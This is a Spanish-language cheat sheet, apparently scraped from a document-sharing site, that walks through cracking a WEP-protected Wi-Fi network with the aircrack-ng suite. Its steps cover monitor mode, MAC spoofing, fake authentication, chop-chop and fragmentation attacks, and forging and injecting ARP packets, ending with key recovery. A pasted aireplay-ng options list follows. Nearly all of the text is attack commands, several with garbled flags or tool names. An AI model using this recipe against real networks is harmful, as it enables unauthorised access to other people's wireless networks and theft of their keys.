Академический Документы
Профессиональный Документы
Культура Документы
ABRIR EN VENTANA 1: Ver Redes: >>iwconfig => ver tarjetas instaladas >>ifconfig=> ver tarjetas activas. Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down Activar /Desactivar Modo monitor: >>airmon-ng start [interfaz] >>airmon-ng stop [interfaz] Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down Cambiar MAC: >>macchanger m MACNUEVA [interfaz] Activar /Desactivar, tarjetas: >>ifconfig [interfaz] up/down MONITOREO: airodump-ng [interfaz] airodump-ng -encripter TIPODECIFRADO [interfaz] DETENER CON CTRL+C Monitoreo especfico: >>airodumpng c CANAL -bssid BSSID w NOMBRECAPTURA [interfaz]
>>aireplay-ng -1 10 e ESSID a BSSID h MACNUESTRA [interfaz] CAMBIAR A AIREPLAY-NG -1-10000 PARA PAQUETEAS ALIVE
ABRIR EN VENTANA 3: Ataque Chop Chop >>aireplayng -4 h MACNUESTRA b BSSID [interfaz] y = yes n = no ~NOTA: ataque de fragmentacin: -5
Saber IP de red: >>tcpdump s 0 n e r ARCHIVO.CAP Fabricar paquete ARP: >>packetforgeng -0 a BSSID h MACNUESTRA k IP_DEL_AP l (ele minuscula) IP_DEL_RANGO y ARCHIVO.XOR w NOMBRE_PAQUETE_QUE_QUERAMOS NOTA: -k :255.255.255.255 => x defecto -l:255.255.255.255 =>x defecto
Inyectar Paquete ARP FABRICADO >>aireplayng -2 x 1024 h MACNUESTRA r ARCHIVO_ARP [interfaz] (x toma sus valores de entre 0 y 1024)
ABRIR EN VENTANA 4: Conseguir Clave >>aircrack_ng NOMBRECAPTURA_01.cap Si hay clientes conectados =>No aplicamos chop-chop
Filter options:
-b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit
-f fromds : frame control, From DS bit -w iswep : frame control, WEP -D : disable AP detection bit
Replay options:
-x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address
-c dmac : set Destination MAC address -h smac : set Source MAC address
-g value : change ring buffer size (default: 8) -F : choose first matching packet
-e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -y prga : keystream for shared key auth -T n : exit after retry fake auth request n time
-j
-k IP -l IP
-B
Source options:
-i iface : capture packets from this interface -r file : extract packets from this pcap file
Miscellaneous options:
-R
--deauth
--fakeauth delay : fake authentication with AP (-1) --interactive --arpreplay --chopchop --fragment --caffe-latte --cfrag --test : interactive frame selection (-2) : standard ARP-request replay (-3) : decrypt/chopchop WEP packet (-4) : generates valid keystream (-5) : query a client for new IVs (-6) : fragments against a client (-7) : tests injection and quality (-9)